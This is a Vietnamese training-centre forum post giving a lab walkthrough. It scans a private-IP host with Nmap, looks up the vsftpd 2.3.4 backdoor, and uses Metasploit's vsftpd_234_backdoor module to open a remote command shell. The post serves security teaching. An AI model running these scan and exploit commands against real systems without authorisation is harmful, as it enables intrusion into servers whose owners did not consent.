Xin chào ! Nếu đây là lần đầu tiên bạn đến với diễn đàn, xin vui lòng danh ra một phút bấm vào đây để đăng kí và tham gia thảo luận cùng VnPro.

Announcement

Collapse
No announcement yet.

Lab Security với NMAP và Metaploit

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
  • #1

    Lab Security với NMAP và Metaploit

    1. Yêu cầu:
    2. Yêu cầu hệ thống, công cụ:
    • CPU 2GHz
    • RAM 4GB
    • Disk 1GB available
    • Nmap
    • Metasploit
    1. Hướng dẫn:
      1. Cài đặt và sử dụng NMAP
    • Cài đặt NMAP trên Centos
    sudo yum install nmap
    • Sử dụng NMAP
    Sử dụng NMAP quét các dịch vụ đang chạy trên host
    sudo nmap -sV -O -v 10.215.27.98
    Click image for larger version Name: dataurl192599.png Views: 83 Size: 67.4 KB ID: 427886
    Click image for larger version Name: dataurl192601.png Views: 83 Size: 78.6 KB ID: 427884
    Kết quả thu được sẽ có port dịch vụ, trạng thái port, tên dịch vụ, version dịch vụ.
    Từ các thông tin này search gg để tìm lỗ hổng hiện có của version đó.
    Ví dụ: tìm lỗ hổng của dịch vụ FTP: search Vulnerability vsftpd 2.3.4
    Click image for larger version Name: dataurl192603.png Views: 84 Size: 37.5 KB ID: 427885
    Tại đây mình sẽ tìm được tên lỗ hổng và cách khai thác và lỗ hổng.
      1. Cài đặt Metasploit:
    • Tạo thư mục Metasploit và tải package install:
    mkdir metasploit
    cd metasploit
    curl https://raw.githubusercontent.com/ra.../msfupdate.erb > msfinstall
    Click image for larger version Name: dataurl192586.png Views: 91 Size: 7.5 KB ID: 427876
    • Cài đặt Metasploit
    sudo chmod +x msfinstall
    ./msfinstall
    Click image for larger version Name: dataurl192589.png Views: 85 Size: 82.2 KB ID: 427877
    • Tạo Database cho Metasploit
    msfdb init
    Click image for larger version Name: dataurl192590.png Views: 85 Size: 86.5 KB ID: 427879
    • Kiểm tra version Metasploit:
    msfconsole –version
    Click image for larger version Name: dataurl192591.png Views: 84 Size: 13.2 KB ID: 427878
    • Truy cập Metasploit
    msfconsole
    Click image for larger version Name: dataurl192593.png Views: 80 Size: 25.5 KB ID: 427880
      1. Khai thác lỗ hổng vsftpd
    Từ kết quả tìm được, có thể xác định vsftpd-2.3.4 tồn tại lỗ hổng Backdoor.
    Sử dụng Metasploit để khai thác lỗ hổng này.
    Dùng search vsftpd trong Metasploit
    Click image for larger version Name: dataurl192595.png Views: 79 Size: 48.5 KB ID: 427881
    Tiến hành khai thác:
    use exploit/unix/ftp/vsftpd_234_backdoor
    set RHOSTS 10.215.27.98
    exploit
    Click image for larger version Name: dataurl192597.png Views: 80 Size: 91.3 KB ID: 427882
    Vậy là chúng ta đã có thể chạy được command shell của máy remote
    Click image for larger version Name: dataurl192598.png Views: 80 Size: 17.4 KB ID: 427883
    Email : vnpro@vnpro.org
    ---------------------------------------------------------------------------------------------------------------
    Trung Tâm Tin Học VnPro
    149/1D Ung Văn Khiêm P25 Q.Bình thạnh TPHCM
    Tel : (08) 35124257 (5 lines)
    Fax: (08) 35124314

    Home page: http://www.vnpro.vn
    Support Forum: http://www.vnpro.org    		 - Chuyên đào tạo quản trị mạng và hạ tầng Internet
    - Phát hành sách chuyên môn
    - Tư vấn và tuyển dụng nhân sự IT
    - Tư vấn thiết kế và hỗ trợ kỹ thuật hệ thống mạng

    Network channel: http://www.dancisco.com
    Blog: http://www.vnpro.org/blog
    Tags: #lab, #metaploit, #nmap, #security, #vnpro
Previous template Next
Working...
X